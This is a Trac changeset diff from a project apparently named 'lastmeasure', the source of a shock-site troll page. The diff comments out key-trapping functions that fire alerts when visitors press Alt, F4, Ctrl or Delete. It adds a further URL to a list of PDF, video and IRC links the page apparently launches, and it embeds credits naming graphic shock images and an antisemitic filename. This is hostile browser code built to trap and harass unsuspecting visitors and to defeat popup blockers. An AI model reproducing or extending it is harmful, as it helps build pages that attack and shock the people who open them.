Changeset 558
- Timestamp:
- 01/10/12 23:47:28 (17 months ago)
- Location:
- trollforge/lastmeasure
- Files:
-
- 2 edited
-
include/js.inc (modified) (1 diff)
-
server/lmresource.h (modified) (3 diffs)
Legend:
- Unmodified
- Added
- Removed
-
trollforge/lastmeasure/include/js.inc
r551 r558 1 /* depreciated by molish() 1 2 function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } 2 3 function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); } 3 4 function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n"); } 4 5 */ 5 6 var nom = navigator.appName.toLowerCase(); 6 7 var agt = navigator.userAgent.toLowerCase(); -
trollforge/lastmeasure/server/lmresource.h
r553 r558 162 162 163 163 ret << 164 /* {{{ replaced by molish() 164 165 "function altf4key() { if (event.keyCode == 18 || event.keyCode == 115)" 165 166 " alert(\"Our lawyer has informed us that we need a warning. So, if you " … … 177 178 "blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO " 178 179 "GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by " 179 "sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n\"); }" 180 "sam, Jmax, JacksonBrown, LiteralKa, Dessimat0r, timecop, and " 181 "others.\n\"); }" 182 }}} */ 183 "var credits = \"LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas. 184 "Starring:" 185 "Spin" 186 "Tubgirl" 187 "Lemonparty" 188 "Bob Goatse" 189 "Penisbird" 190 "Pillowfight" 191 "Christmas" 192 "Rusty's Wife" 193 "What the fuck? That guy's ass is showing in his baby's picture!" 194 "\n" 195 "Total, complete, all-versions, popup blocker bashing-to-pieces by goat-see" 196 "hey.swf by rkz" 197 "PROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)" 198 "Updated by sam, Jmax, JacksonBrown, LiteralKa, Dessimat0r, timecop, and others.\n\";" 199 180 200 "var nom = navigator.appName.toLowerCase();" 181 201 "var agt = navigator.userAgent.toLowerCase();" … … 255 275 "var protos = [" 256 276 " \"http://" << host << "/lm.pdf\"," 277 " \"http://" << host << "/lm2.pdf\"," 257 278 " \"http://" << host << "/jews.wmv\"," 258 279 " \"irc://irc.gnaa.eu/gnaa\","
Note: See TracChangeset
for help on using the changeset viewer.
